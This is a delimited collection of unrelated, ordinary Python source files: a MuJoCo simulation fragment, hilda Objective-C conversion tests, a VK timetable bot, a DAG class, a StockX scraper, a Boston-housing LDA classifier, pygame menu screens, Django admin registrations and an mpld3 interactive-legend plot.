if 6000 < i < 9000:
sim.model.body_mass[2] = sim.model.body_mass[2] + 0.1
if i > 9000:
if sim.model.body_mass[2] > 1:
sim.model.body_mass[2] = sim.model.body_mass[2] - 0.1
# print(sim.data.ctrl[0])
# left_val = (math.sin(i / 400) * 2.5) - 2.5
# sim.data.ctrl[0] = left_val
# print(sim.data.qfrc_passive)
# right_val = (math.sin(math.pi + i / 1000) * 2.5) - 2.5
# sim.data.ctrl[1] = right_val
viewer.render()
# fig = go.Figure(
# data=[
# go.Scatter(
# y=forces
# ),
# go.Scatter(
# y=sensor_forces
# )
# ],
# layout=go.Layout(
# title='Calculated tension over time'
# )
# )
# plot(fig, filename='total-force-by-excitation.html')
# fig = go.Figure(
# data=[
# go.Scatter(
# y=lengths
# )
# ],
# layout=go.Layout(
# title='Tendon Length by Time'
# )
# )
# plot(fig, filename='length-by-time.html')
fig = go.Figure(
data=[
go.Scatter(
y=forces,
x=lengths
),
go.Scatter(
y=act_forces,
x=lengths
),
go.Scatter(
y=total_forces,
x=lengths
),
],
layout=go.Layout(
title='Tension by Length',
xaxis=dict(
range=[0.0, 1.8]
)
)
)
plot(fig, filename='tension-by-length.html')
|
from datetime import datetime, timezone
import pytest
from hilda.exceptions import ConvertingFromNSObjectError
@pytest.mark.parametrize('source', [
    '',
    '3123123',
    'asdsdasd',
    '12312sadasd',
    'The quick brown fox jumps over the lazy frog123',
])
def test_cfstr(hilda_client, source: str):
    """
    Round-trip: build an Objective-C string literal and convert it back.

    :param hilda.hilda_client.HildaClient hilda_client: Hilda client.
    :param source: CFSTR to be converted to Python string.
    """
    # NOTE(review): `source` is interpolated unescaped into @"..."; inputs
    # containing quotes or backslashes would break the expression.
    cfstr = hilda_client.evaluate_expression(f'@"{source}"')
    assert cfstr
    assert hilda_client.from_ns(cfstr) == source
def test_ns_data(hilda_client):
    """
    Round-trip raw bytes through NSData.

    :param hilda.hilda_client.HildaClient hilda_client: Hilda client.
    """
    data = b'\x01\x00asdasd\xff\xfe58'
    # Copy the bytes into target memory, then wrap them in an NSData.
    with hilda_client.safe_malloc(len(data)) as buffer:
        buffer.write(data)
        ns_data = hilda_client.evaluate_expression(f'[NSData dataWithBytes:(char *)0x{buffer:x} length:{len(data)}]')
        assert hilda_client.from_ns(ns_data) == data


def test_ns_data_in_dict(hilda_client):
    """
    NSData nested inside an NSDictionary converts to bytes inside a dict.

    :param hilda.hilda_client.HildaClient hilda_client: Hilda client.
    """
    data = b'\x01\x00asdasd\xff\xfe58'
    with hilda_client.safe_malloc(len(data)) as buffer:
        buffer.write(data)
        ns_dict = hilda_client.evaluate_expression(
            f'@{{"a": [NSData dataWithBytes:(char *)0x{buffer:x} length:{len(data)}]}}'
        )
        assert hilda_client.from_ns(ns_dict) == {"a": data}


def test_ns_data_in_array(hilda_client):
    """
    NSData nested inside an NSArray converts to bytes inside a list.

    :param hilda.hilda_client.HildaClient hilda_client: Hilda client.
    """
    data = b'\x01\x00asdasd\xff\xfe58'
    with hilda_client.safe_malloc(len(data)) as buffer:
        buffer.write(data)
        ns_dict = hilda_client.evaluate_expression(
            f'@[[NSData dataWithBytes:(char *)0x{buffer:x} length:{len(data)}]]'
        )
        assert hilda_client.from_ns(ns_dict) == [data]


@pytest.mark.parametrize('day, month, year', [(1, 1, 1970), (11, 10, 2021)])
def test_ns_date(hilda_client, day: int, month: int, year: int):
    """
    NSDate built from UTC components converts to an aware datetime.

    :param hilda.hilda_client.HildaClient hilda_client: Hilda client.
    :param day: Date day.
    :param month: Date month.
    :param year: Date year.
    """
    # The components are pinned to UTC, so the expected datetime is aware
    # with tzinfo=timezone.utc.
    date = hilda_client.evaluate_expression(f'''
        NSDateComponents *comps = [NSDateComponents new];
        [comps setDay:{day}];
        [comps setMonth:{month}];
        [comps setYear:{year}];
        [comps setTimeZone:[NSTimeZone timeZoneWithAbbreviation:@"UTC"]];
        [[NSCalendar currentCalendar] dateFromComponents:comps];
    ''')
    assert hilda_client.from_ns(date) == datetime(day=day, month=month, year=year, tzinfo=timezone.utc)
@pytest.mark.parametrize('source, result', [
    # Dictionaries
    ('@{1:1,234234:"asdasd","a":@[0,0],"asdasd":234234}', {'asdasd': 234234, 234234: 'asdasd', 1: 1, 'a': [0, 0]}),
    ('@{}', {}),
    ('@{"asdasds":324234}', {'asdasds': 324234}),
    ('@{[NSNull null]:324234}', {None: 324234}),
    ('@{@{"a":1}:324234}', {(("a", 1),): 324234}),
    ('@{@["a",1]:324234}', {("a", 1): 324234}),
    ('@{1:@{2:@{3:"a"}}}', {1: {2: {3: 'a'}}}),
    # Arrays
    ('@["asdasd",234234,1,1,@{"a":0}]', ['asdasd', 234234, 1, 1, {'a': 0}]),
    ('@[]', []),
    ('@["asdasds",324234]', ['asdasds', 324234]),
    ('@[1,@[2,@[3,"a"]]]', [1, [2, [3, 'a']]]),
    # Sets
    # NOTE(review): an NSSet has no defined element order, so comparing its
    # conversion against an ordered list may be flaky -- confirm from_ns's
    # ordering guarantee for sets.
    ('[NSSet setWithArray: @[@"1", @42]]', ['1', 42])
])
def test_ns_nested_objects(hilda_client, source: str, result):
    """
    :param hilda.hilda_client.HildaClient hilda_client: Hilda client.
    :param source: NS object expression to be converted to Python object.
    :param result: Python object.
    """
    ns_object = hilda_client.evaluate_expression(source)
    assert ns_object
    assert hilda_client.from_ns(ns_object) == result


def test_ns_none(hilda_client):
    """
    NSNull converts to Python None.

    :param hilda.hilda_client.HildaClient hilda_client: Hilda client.
    """
    ns_object = hilda_client.evaluate_expression('[NSNull null]')
    assert hilda_client.from_ns(ns_object) is None


# NOTE(review): the 1 / 3 case relies on str(1/3) round-tripping exactly
# through NSDecimalNumber back to the same float -- verify on target.
@pytest.mark.parametrize('source', [0, 1, -1, 1.5, -1.5, 0xfffffffffffffffffff, -0xfffffffffffffffffff, 1 / 3])
def test_ns_number(hilda_client, source):
    """
    :param hilda.hilda_client.HildaClient hilda_client: Hilda client.
    :param source: Number to convert from NS object.
    """
    ns_number = hilda_client.evaluate_expression(f'[NSDecimalNumber decimalNumberWithString:@"{source}"]')
    assert hilda_client.from_ns(ns_number) == source


@pytest.mark.parametrize('source', [
    '[NSObject new]',
    '0x33',
])
def test_error_converting_from_ns(hilda_client, source):
    """
    Objects with no Python equivalent must raise ConvertingFromNSObjectError.

    :param hilda.hilda_client.HildaClient hilda_client: Hilda client.
    :param source: Expression to convert to python object.
    """
    with pytest.raises(ConvertingFromNSObjectError):
        hilda_client.from_ns(hilda_client.evaluate_expression(source))
|
from database import get_connection
class vkBot:
    """Minimal VK chat bot: greets, says goodbye, and otherwise treats the
    message as a group number whose timetable is fetched from the database."""

    def __init__(self, user_id):
        # id of the VK user this bot instance talks to
        self.user_id = user_id
        self.commands = ['расписание']
        self.hello_message = ['привет', 'здравствуйте', 'приветствую']
        self.goodbye_message = ['пока', 'удачи', 'увидимся', 'спасибо']

    def new_msg(self, message):
        """Return the bot's reply to an incoming message string."""
        text = message.lower()
        if text in self.hello_message:
            return "Привет, меня зовут Планктон\n Напиши номер своей группы и получишь расписание\n Например '8391'"
        elif text in self.goodbye_message:
            return "Успехов тебе!"
        else:
            try:
                msg = int(message)
                info = get_connection(msg)
                return info
            except Exception:
                # Was a bare `except:`; narrowed so KeyboardInterrupt and
                # SystemExit are no longer swallowed.  Parse errors and DB
                # failures still get the friendly fallback answer.
                return 'Что-то я тебя не понимаю\nПопробуй еще раз :-)'
|
""" Fast, compact DAG for analyzing expression dependencies
:Author: Arthur Goldberg <Arthur.Goldberg@mssm.edu>
:Date: 2020-07-08
:Copyright: 2020, Karr Lab
:License: MIT
"""
class DAG(object):
    """ Fast, compact DAG for analyzing expression dependencies

    `networkx` is not usable because its traversal methods use too much RAM.
    `DAG` represents a DAG as an adjacency list in a Python `dict` that maps
    each node to the `set` of its successor nodes.
    """

    def __init__(self):
        self.dag = {}  # node -> set of successor nodes

    def add_node(self, node):
        """ Add a node

        Raises:
            ValueError: if `node` is already in this DAG
        """
        if node in self.dag:
            # name the offending node (the message used to be a literal string)
            raise ValueError(f'node {node!r} is already in the DAG')
        self.dag[node] = set()

    def rm_node(self, node):
        """ Remove a node

        Note: edges from other nodes *to* `node` are not removed.

        Raises:
            ValueError: if `node` is not in this DAG
        """
        if node not in self.dag:
            raise ValueError(f'node {node!r} is not in the DAG')
        del self.dag[node]

    def nodes(self):
        """ Get a view of the nodes """
        return self.dag.keys()

    def add_edge(self, source, dest):
        """ Add an edge from `source` to `dest`

        `source` is added as a node if needed; `dest` is only recorded in the
        adjacency set and does not become a key until it gets outgoing edges.
        """
        if source not in self.dag:
            self.add_node(source)
        self.dag[source].add(dest)

    def rm_edge(self, source, dest):
        """ Remove an edge; a missing edge is silently ignored (`discard`)

        Raises:
            ValueError: if `source` is not in this DAG
        """
        if source not in self.dag:
            raise ValueError(f'source node {source!r} is not in the DAG')
        self.dag[source].discard(dest)

    def edges(self):
        """ Provide all edges as a list of (source, dest) pairs """
        edges = []
        for src, dests in self.dag.items():
            edges.extend([(src, d) for d in dests])
        return edges

    def dfs(self, source):
        """ Generate `source` and every node reachable from it

        Each node is yielded exactly once.  Ordering among siblings depends
        on `set` iteration order, so the walk is depth-first only up to that.
        """
        if source not in self.dag:
            # source has no outgoing edges: it is the whole traversal
            yield source
        else:
            visited = set()
            visited.add(source)
            to_visit = list()  # a stack of adjacency sets still to expand
            to_visit.append(self.dag[source])
            yield source
            while to_visit:
                nodes = to_visit.pop()
                for node in nodes:
                    if node not in visited:
                        yield node
                        visited.add(node)
                        if node in self.dag:
                            to_visit.append(self.dag[node])
|
from urllib.request import Request, urlopen
from bs4 import BeautifulSoup as soup
from time import sleep
from Stockx.StockxClothing import ClothItem
from Stockx.StockxShoe import ShoeItem
from pymongo import *
def read_page(item):
    """Fetch and parse each URL in `item`; return the parsed soup.

    NOTE(review): only the soup of the *last* link survives the loop.  The
    callers below always pass a single-element list, so this works, but the
    signature promises more than it delivers.
    """
    for link in item:
        # Spoof a browser User-Agent; StockX blocks the default urllib agent.
        request = Request(link, headers={'User-Agent': 'Mozilla/5.0'})
        page = urlopen(request).read()
        parsed = soup(page, 'html.parser')
    return parsed


def extract_data(item):
    """Scrape the sale value and product details out of a StockX product page.

    The magic slice offsets ([26:], [75:], word positions) are tied to the
    exact markup StockX served when this was written -- fragile by design.
    """
    new = []
    values = []
    new.append(item.findAll("div", {"class": "sale-value"}))
    details = item.findAll("div", {"class": "detail"})
    items = str(details).split('<div class="detail">')
    for y in new:
        # Strip the leading tag text; keep the number before the next '<'.
        newCost = str(y)[26:]
        arr = newCost.split("<")
        values.append(arr[0])
    for x in range(len(items)):
        if x == 0:
            print(" ")
        elif x == 1 or x == 2:
            values.append(str(items[x])[75:].split(" ")[1])
        else:
            values.append(str(items[x])[75:].split(" ")[2])
    print("####################################################")
    print(values)
    # values[0:5]: price followed by four detail fields.
    test = ShoeItem(values[0], values[1], values[2], values[3], values[4])
    return test


def search_page(sPage):
    """Debug helper: dump every <div> found on the parsed search page."""
    new = []
    new.append(sPage.findAll("div"))
    print(new)
# Scrape a fixed catalogue of Yeezy Boost 350 v2 colourways, then dump the
# site's landing page for inspection.
itemlist = []
search = ["https://stockx.com/"]
base = "https://stockx.com/adidas-yeezy-boost-350-v2-"
models = ["static", "static-reflective", "sesame", "cream-white", "semi-frozen-yellow" ,
          "white-core-black-red", "butter", "beluga-2-0", "blue-tint", "core-black-red-2017",
          "core-black-white", "steeple-grey-beluga-solar-red", "core-black-copper",
          "core-black-red", "core-black-green", "oxford-tan",]
for page in models:
    new = read_page([base + page])
    Newitem = extract_data(new)
    itemlist.append(Newitem)
    Newitem.simpleCalc()
    sleep(3)  # be polite: rate-limit successive requests
print(itemlist)
new = read_page(search)
print(new)
search_page(new)
|
#!/usr/bin/env python
import glob
import pandas
import pandas.io.json
import json
def fix_frame(filename, columns):
    """Convert a headered CSV file into a JSON file of column lists.

    Reads `filename`, renames its columns to `columns`, and writes
    {column: [values in row order]} to the same path with a .json extension.
    """
    # pandas.DataFrame.from_csv was deprecated and then removed;
    # read_csv is the supported equivalent.
    frame = pandas.read_csv(filename)
    frame.columns = columns
    # orient='list' yields {column: [values]} directly, replacing the old
    # to_dict() dict-of-dicts round trip.
    data = frame.to_dict(orient='list')
    json_filename = filename.replace('.csv', '.json')
    json_data = json.dumps(data)
    with open(json_filename, 'w+') as out:
        out.write(json_data)
# Convert every high-frequency per-exchange CSV dump in the working
# directory to JSON (Python 2 script).
highfreqs = [f for f in glob.glob('sixify_*_*.csv')]
# print highfreqs
# fix_frame('sixify_aggregation_btcusd.csv',
#           ['amount', 'price', 'date'])
for filename in highfreqs:
    print filename
    fix_frame(filename,
              ['price', 'amount', 'date'])
|
import sys
"""
Brian Grenier
1545276
bgrenier
List any resources you used below (eg. urls, name of the algorithm from our code archive).
Remember, you are permitted to get help with general concepts about algorithms
and problem solving, but you are not permitted to hunt down solutions to
these particular problems!
N/A
List any classmate you discussed the problem with. Remember, you can only
have high-level verbal discussions. No code should be shared, developed,
or even looked at in these chats. No formulas or pseudocode should be
written or shared in these chats.
N/A
By submitting this code, you are agreeing that you have solved in accordance
with the collaboration policy in CMPUT 403.
"""
if __name__ == '__main__':
    # Read n "(place, year)" visit records, grouping the years by place.
    visit_years = {}
    for _ in range(int(input())):
        place, year = input().split()
        visit_years.setdefault(place, []).append(int(year))
    # Sort each place's years so queries can index chronologically.
    for years in visit_years.values():
        years.sort()
    # Answer q queries: the k-th (1-based) earliest year `place` was visited.
    for _ in range(int(input())):
        place, index = input().split()
        print(visit_years[place][int(index) - 1])
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import numpy as np
import sys
def classifier(data, num_crossval):
    """Fisher LDA with k-fold cross-validation on a 14-column array.

    Rows of `data` are samples; columns 0-12 are features and column 13 is a
    binary label (0/1).  The data is split into `num_crossval` contiguous
    folds; each fold serves once as the test set.

    Prints the standard deviation of the per-fold error rates and returns
    (avg_test_error, avg_train_error).
    """
    train_error = []
    test_error = []
    # Integer division: a float fold size made the slice indices below raise
    # TypeError on Python 3.
    foldsize = len(data) // num_crossval
    # Iterate over the requested number of folds (was hard-coded to 10).
    for k in range(num_crossval):
        testing = data[k * foldsize:(k + 1) * foldsize]
        a = data[:k * foldsize]
        b = data[(k + 1) * foldsize:]
        training = np.concatenate((a, b))
        # Split the training fold by class label; keep only feature columns.
        x0 = training[training[:, 13] == 0][:, 0:-1]
        x1 = training[training[:, 13] == 1][:, 0:-1]
        # Class means as 1x13 row vectors.
        m1 = x1.mean(axis=0).reshape(13, 1).T
        m0 = x0.mean(axis=0).reshape(13, 1).T
        # Within-class scatter: sum of outer products of deviations from the
        # class mean.  (The between-class scatter `sb` computed here before
        # was never used and has been removed.)
        tempsw1 = 0
        tempsw0 = 0
        for i in range(len(x1)):
            diff = x1[i, :] - m1
            tempsw1 = tempsw1 + diff * diff.T
        for i in range(len(x0)):
            diff = x0[i, :] - m0
            tempsw0 = tempsw0 + diff * diff.T
        sw = tempsw0 + tempsw1
        d = (m1 - m0).T
        # LDA direction w = Sw^-1 (m1 - m0); threshold at the means' midpoint.
        w = np.dot(np.linalg.inv(sw), d)
        thresh = np.dot((m1 + m0) / 2, w)
        test_error.append(_error_rate(testing, w, thresh))
        train_error.append(_error_rate(training, w, thresh))
    avg_test_error = np.sum(test_error) / num_crossval
    avg_train_error = np.sum(train_error) / num_crossval
    # Population standard deviation over the folds (previously divided by a
    # hard-coded 10 regardless of num_crossval, and passed a generator to
    # np.sum, which is deprecated).
    testSd = np.sqrt(np.sum([(x - avg_test_error) ** 2 for x in test_error]) / float(num_crossval))
    trainSd = np.sqrt(np.sum([(x - avg_train_error) ** 2 for x in train_error]) / float(num_crossval))
    print('train standard deviation:', trainSd, 'test standard deviation: ', testSd)
    return avg_test_error, avg_train_error


def _error_rate(samples, w, thresh):
    """Fraction of `samples` misclassified by thresholding x.w at `thresh`."""
    incorrect = 0
    for i in range(len(samples)):
        label = 1 if np.dot(samples[i, 0:-1], w) > thresh else 0
        if label != samples[i, 13]:
            incorrect = incorrect + 1
    return incorrect / float(len(samples))
# CLI driver: <data.csv> <num_folds>.
# Builds two label variants of the dataset and cross-validates each.
filename = sys.argv[1]
num_crossval = int(sys.argv[2])

boston50 = np.genfromtxt(filename, delimiter=',')
boston75 = np.genfromtxt(filename, delimiter=',')

# Binarise the response (column 13) at the 50th / 75th percentile:
# below the cutoff -> 0, at-or-above -> 1.
median = np.percentile(boston50[:, 13], 50)
thirdquart = np.percentile(boston75[:, 13], 75)
for dataset, cutoff in ((boston50, median), (boston75, thirdquart)):
    dataset[:, 13] = np.where(dataset[:, 13] < cutoff, 0.0, 1.0)

print('For Boston 50 :')
teste50, traine50 = classifier(boston50, num_crossval)
print("test error percent for boston50 is: ", teste50 * 100, ' and train error is: ', traine50 * 100)
print('For Boston 75 :')
teste75, traine75 = classifier(boston75, num_crossval)
print("test error percent for boston75 is: ", teste75 * 100, ' and train error is: ', traine75 * 100)
|
from controller.film_ctrl import FilmCtrl
from controller.client_ctrl import ClientCtrl
from controller.rent_ctrl import RentCtrl
from domain.val_film import FilmValidator
from domain.val_rent import RentValidator
from domain.val_client import ClientValidator
from repository.film_repo import FilmRepo
from repository.rent_repo import RentRepo
from repository.client_repo import ClientRepo
from ui.console import Console
# Composition root: build validators, repositories and controllers in
# dependency order, then hand everything to the console UI.
client_validator = ClientValidator()
film_validator = FilmValidator()
rent_validator = RentValidator()

client_repository = ClientRepo()
film_repository = FilmRepo()
rent_repository = RentRepo()

client_controller = ClientCtrl(client_validator, client_repository)
film_controller = FilmCtrl(film_validator, film_repository)
rent_controller = RentCtrl(rent_validator, client_repository,
                           film_repository, rent_repository)

console = Console(client_controller, film_controller, rent_controller)
console.startUI()
|
from django.contrib import admin
from .models import *
# Register your models here.
#
# class MenuAdminSite(admin.AdminSite):
#
# def get_app_list(self, request):
# """
# Return a sorted list of all the installed apps that have been
# registered in this site.
# """
# ordering = {
# Unit: 1,
# Jobcategory: 2,
# "Job": 3,
# "Relation": 4,
# "Agecategory": 5,
# "Weightcategory": 6,
# "Bloodpressurecategory": 7,
# "Heartbeatcategory": 8,
# "Healthstatus": 9,
# "Region": 10,
# "Subregion": 11,
# "Countrycategory": 12,
# "Country": 13,
# "District": 14,
# "Ward": 15,
# "Street": 16,
# "Address": 17,
# "Memberinfo": 18,
# "Familyconsume": 19,
# "Objectconsume": 20,
# "Foodcategory": 21,
# "Foodingredient": 22,
# "Balancemeal": 23,
# "Dailymeal": 24,
# "Dailyfamilyconsume": 25,
# "Menusuggest": 26,
# "MenuHistory": 27,
# "MenuActual": 28
# }
# app_dict = self._build_app_dict(request)
#
# # Sort the apps alphabetically.
# app_list = sorted(app_dict.values(), key=lambda x: x['name'].lower())
#
# # Sort the models alphabetically within each app.
#
# for app in app_list:
# app['models'].sort(key=lambda x: ordering[x['name']])
#
# return app_list
#
#
# admin.site = MenuAdminSite()
#
#
# Expose every model through the default admin site.  Registration
# order is preserved exactly from the original hand-written list.
_ADMIN_MODELS = (
    Unit, Jobcategory, Job, Relation, Agecategory, Weightcategory,
    Bloodpressurecategory, Heartbeatcategory, Healthstatus, Region,
    Subregion, Countrycategory, Country, District, Ward, Street,
    Address, Memberinfo, Familyconsume, Objectconsume, Food,
    Foodchoice, Foodcategory, Ingredientcategory, Ingredient,
    Ingredientcount, Foodingredient, Balancemeal, Dailymeal,
    Dailyfamilyconsume, Menusuggest, MenuHistory, MenuActual, Comment,
)
for _model in _ADMIN_MODELS:
    admin.site.register(_model)
|
__author__ = 'OTL'
import pygame
from pygame.locals import *
import resources
import noise_surfaces
# TODO add buttons
class MenuItem():
    """A single clickable caption in a Menu.

    Two text surfaces are rendered up front (normal and highlighted)
    and swapped as the mouse hovers; ``new_state`` names the game state
    to switch to when the item is activated.
    """
    def __init__(self, caption, new_state):
        self.caption = caption
        green = (128, 255, 128)
        white = (255, 255, 255)
        self.text_normal = resources.get_font(40).render(caption, True, green)
        self.text_highlight = resources.get_font(50).render(caption, True, white)
        # Start in the un-highlighted look.
        self.text_surface = self.text_normal
        self.new_state = new_state
        self.rect = self.text_surface.get_rect()
class Menu():
    """A vertical stack of MenuItem objects with mouse handling."""

    def __init__(self, state, top=100):
        self.state = state          # owning game state (provides .screen, .next_state)
        self.menu_selected = None   # item currently under the mouse, if any
        self.menu_items = []
        self.top = top              # y coordinate of the first item

    def draw(self, screen):
        """Blit every item at its stored rect."""
        for entry in self.menu_items:
            screen.blit(entry.text_surface, entry.rect)

    def do_event(self, event):
        """Track hover highlighting; fire the hovered item on mouse-up."""
        if event.type == MOUSEMOTION:
            pointer = pygame.mouse.get_pos()
            self.menu_selected = None
            for entry in self.menu_items:
                hovered = entry.rect.collidepoint(pointer)
                entry.text_surface = entry.text_highlight if hovered else entry.text_normal
                if hovered:
                    self.menu_selected = entry
        if event.type == MOUSEBUTTONUP and self.menu_selected is not None:
            print(self.menu_selected.caption)
            self.state.next_state = self.menu_selected.new_state

    def add_item(self, menu_item):
        """Append an item, centring it and stacking it below the last one."""
        menu_item.rect.center = self.state.screen.get_rect().center
        if self.menu_items:
            previous = self.menu_items[-1]
            menu_item.rect.top = previous.rect.top + (previous.rect.height * 1.5)
        else:
            menu_item.rect.top = self.top
        self.menu_items.append(menu_item)
class MainMenu():
    """Title-screen state: animated Perlin-noise background plus a Menu
    with Play/Quit items.  ``next_state`` is polled by the outer state
    machine; the value "this" means stay on this screen."""
    def __init__(self,screen):
        self.screen = screen
        self.next_state = "this"
        # Create the menu
        self.menu = Menu(self, 300)
        self.menu.add_item(MenuItem("Play", "main"))
        self.menu.add_item(MenuItem("Quit", "quit"))
        # Animated noise backdrop; init(50) presumably sets its
        # resolution/scale — TODO confirm against noise_surfaces.
        self.background = noise_surfaces.Animated_perlin_surface()
        self.background.init(50)
    def update(self):
        self.background.update()
        pass
    def draw(self):
        # self.screen.fill((0,0,0))
        self.background.draw(self.screen)
        # Title: centred horizontally, pinned at y = 100.
        text = resources.get_font(60).render("Begemmed!", True, (128, 255, 128))
        textpos = text.get_rect(center = self.screen.get_rect().center)
        textpos.y = 100
        self.screen.blit(text, textpos)
        # NOTE(review): the subtitle reuses the title's rect (its own
        # centering line is commented out below), so its x position is
        # inherited from the title's rect — presumably intentional.
        text = resources.get_font(35).render("by Oliver Lomax", True, (128, 255, 128))
        # textpos = text.get_rect(center = self.screen.get_rect().center)
        textpos.y += 100
        self.screen.blit(text, textpos)
        text = resources.get_font(25).render("Music by Visager", True, (128, 255, 128))
        textpos = text.get_rect(center = self.screen.get_rect().center)
        textpos.y += 300
        self.screen.blit(text, textpos)
        # Draw the menu items
        self.menu.draw(self.screen)
    def do_event(self, event):
        # Space is a keyboard shortcut for "Play".
        if event.type == KEYUP:
            if event.key == K_SPACE:
                self.next_state = "main"
        # Send events to the menu
        self.menu.do_event(event)
class GameOver():
    """Game-over overlay state; any key press returns to the menu."""

    def __init__(self, screen):
        self.screen = screen
        self.next_state = "this"   # "this" == remain in this state
        resources.play_sound("die")

    def update(self):
        pass

    def draw(self):
        # Blitting a translucent grey layer every frame fades the final
        # game frame out a little more each tick.
        bounds = self.screen.get_rect()
        veil = pygame.Surface((bounds.width, bounds.height), pygame.SRCALPHA, 32)
        veil.fill((100, 100, 100, 10))
        self.screen.blit(veil, (0, 0))

        caption = resources.get_font(50).render("Game Over!", True, (0, 200, 0))
        self.screen.blit(caption, caption.get_rect(center=bounds.center))

        prompt = resources.get_font(20).render("Press any key to continue", True, (0, 200, 0))
        prompt_rect = prompt.get_rect(center=bounds.center)
        prompt_rect.y += 300
        self.screen.blit(prompt, prompt_rect)

    def do_event(self, event):
        if event.type == KEYUP:
            self.next_state = "menu"
|
import numpy as np
import pandas as pd
import ipdb
import cPickle as pickle
import matplotlib.pyplot as plt
plt.style.use("ggplot")
import mpld3
from mpld3 import plugins
from mpld3.utils import get_id
### My plotting code.
def _load_pickle(path):
    """Load one pickle, closing the file handle afterwards.

    The original used ``pickle.load(open(path))`` which leaked the file
    object and read in text mode; "rb" is safe for any pickle protocol.
    """
    with open(path, "rb") as fh:
        return pickle.load(fh)

# Two (x, y) series: one line per team, plus every 100th point as markers.
xw, yw = _load_pickle("media/xw.cpkl"), _load_pickle("media/yw.cpkl")
xb, yb = _load_pickle("media/xb.cpkl"), _load_pickle("media/yb.cpkl")
labels = ["GSW", "CHI"]
fig = plt.figure(figsize=(13, 10))
ax1 = fig.add_subplot(2, 1, 1)
ax2 = fig.add_subplot(2, 1, 2)
l1 = ax1.plot(xw, yw, lw=2,)
xsamples = range(0, len(xw), 100)
s1 = ax2.plot(np.array(xw)[xsamples], np.array(yw)[xsamples], 'o', ms=8, )
l1.extend(ax1.plot(xb, yb, lw=2,))
xsamples = range(0, len(xb), 100)
s1.extend(ax2.plot(np.array(xb)[xsamples], np.array(yb)[xsamples], 'o', ms=8, ))
### Their plotting code.
# N_paths = 5
# N_steps = 100
#
# x = np.linspace(0, 10, 100)
# y = 0.1 * (np.random.random((N_paths, N_steps)) - 0.5)
# y = y.cumsum(1)
#
#
# fig = plt.figure()
# ax1 = fig.add_subplot(2,1,1)
# ax2 = fig.add_subplot(2,1,2)
#
# labels = ["a", "b", "c", "d", "e"]
# l1 = ax1.plot(x, y.T, marker='x',lw=2, alpha=0.1)
# s1 = ax2.plot(x, y.T, 'o', ms=8, alpha=0.1)
# Debug breakpoint removed: ipdb.set_trace() halts the script waiting
# for interactive input and must not ship.
# Interactive legend: clicking a legend box toggles the paired line and
# marker series.  The plugin's client-side code is monkey-patched below
# with a customised copy of mpld3's InteractiveLegend JavaScript.
# NOTE(review): the JS template still contains `debugger;` statements
# and a console.log/setTimeout debugging block — they ship to the
# browser as-is; consider stripping them before release.
ilp = plugins.InteractiveLegendPlugin(zip(l1, s1), labels)
ilp.JAVASCRIPT = """
mpld3.register_plugin("interactive_legend", InteractiveLegend);
InteractiveLegend.prototype = Object.create(mpld3.Plugin.prototype);
InteractiveLegend.prototype.constructor = InteractiveLegend;
InteractiveLegend.prototype.requiredProps = ["element_ids", "labels"];
InteractiveLegend.prototype.defaultProps = {"ax":null,
"alpha_unsel":0.2,
"alpha_over":1.0,
"start_visible":true}
function InteractiveLegend(fig, props){
mpld3.Plugin.call(this, fig, props);
};
InteractiveLegend.prototype.draw = function(){
var alpha_unsel = this.props.alpha_unsel;
var alpha_over = this.props.alpha_over;
var legendItems = new Array();
for(var i=0; i<this.props.labels.length; i++){
var obj = {};
console.log("HELLO THERE");
setTimeout(function(){debugger;}, 3000);
obj.label = this.props.labels[i];
var element_id = this.props.element_ids[i];
mpld3_elements = [];
debugger;
for(var j=0; j<element_id.length; j++){
var mpld3_element = mpld3.get_element(element_id[j], this.fig);
// mpld3_element might be null in case of Line2D instances
// for we pass the id for both the line and the markers. Either
// one might not exist on the D3 side
if(mpld3_element){
mpld3_elements.push(mpld3_element);
}
}
obj.mpld3_elements = mpld3_elements;
obj.visible = this.props.start_visible[i]; // should become be setable from python side
legendItems.push(obj);
set_alphas(obj, false);
}
// determine the axes with which this legend is associated
var ax = this.props.ax
if(!ax){
ax = this.fig.axes[0];
} else{
ax = mpld3.get_element(ax, this.fig);
}
// add a legend group to the canvas of the figure
var legend = this.fig.canvas.append("svg:g")
.attr("class", "legend");
// add the rectangles
legend.selectAll("rect")
.data(legendItems)
.enter().append("rect")
.attr("height", 10)
.attr("width", 25)
.attr("x", ax.width + ax.position[0] + 25)
.attr("y",function(d,i) {
return ax.position[1] + i * 25 + 10;})
.attr("stroke", get_color)
.attr("class", "legend-box")
.style("fill", function(d, i) {
return d.visible ? get_color(d) : "white";})
.on("click", click).on('mouseover', over).on('mouseout', out);
// add the labels
legend.selectAll("text")
.data(legendItems)
.enter().append("text")
.attr("x", function (d) {
return ax.width + ax.position[0] + 25 + 40;})
.attr("y", function(d,i) {
return ax.position[1] + i * 25 + 10 + 10 - 1;})
.text(function(d) { return d.label });
// specify the action on click
function click(d,i){
d.visible = !d.visible;
d3.select(this)
.style("fill",function(d, i) {
return d.visible ? get_color(d) : "white";
})
set_alphas(d, false);
};
// specify the action on legend overlay
function over(d,i){
set_alphas(d, true);
};
// specify the action on legend overlay
function out(d,i){
set_alphas(d, false);
};
// helper function for setting alphas
function set_alphas(d, is_over){
for(var i=0; i<d.mpld3_elements.length; i++){
var type = d.mpld3_elements[i].constructor.name;
if(type =="mpld3_Line"){
var current_alpha = d.mpld3_elements[i].props.alpha;
var current_alpha_unsel = current_alpha * alpha_unsel;
var current_alpha_over = current_alpha * alpha_over;
d3.select(d.mpld3_elements[i].path[0][0])
.style("stroke-opacity", is_over ? current_alpha_over :
(d.visible ? current_alpha : current_alpha_unsel))
.style("stroke-width", is_over ?
alpha_over * d.mpld3_elements[i].props.edgewidth : d.mpld3_elements[i].props.edgewidth);
} else if((type=="mpld3_PathCollection")||
(type=="mpld3_Markers")){
var current_alpha = d.mpld3_elements[i].props.alphas[0];
var current_alpha_unsel = current_alpha * alpha_unsel;
var current_alpha_over = current_alpha * alpha_over;
d3.selectAll(d.mpld3_elements[i].pathsobj[0])
.style("stroke-opacity", is_over ? current_alpha_over :
(d.visible ? current_alpha : current_alpha_unsel))
.style("fill-opacity", is_over ? current_alpha_over :
(d.visible ? current_alpha : current_alpha_unsel));
} else{
console.log(type + " not yet supported");
}
}
};
// helper function for determining the color of the rectangles
function get_color(d){
var type = d.mpld3_elements[0].constructor.name;
var color = "black";
if(type =="mpld3_Line"){
color = d.mpld3_elements[0].props.edgecolor;
} else if((type=="mpld3_PathCollection")||
(type=="mpld3_Markers")){
color = d.mpld3_elements[0].props.facecolors[0];
} else{
console.log(type + " not yet supported");
}
return color;
};
};
"""
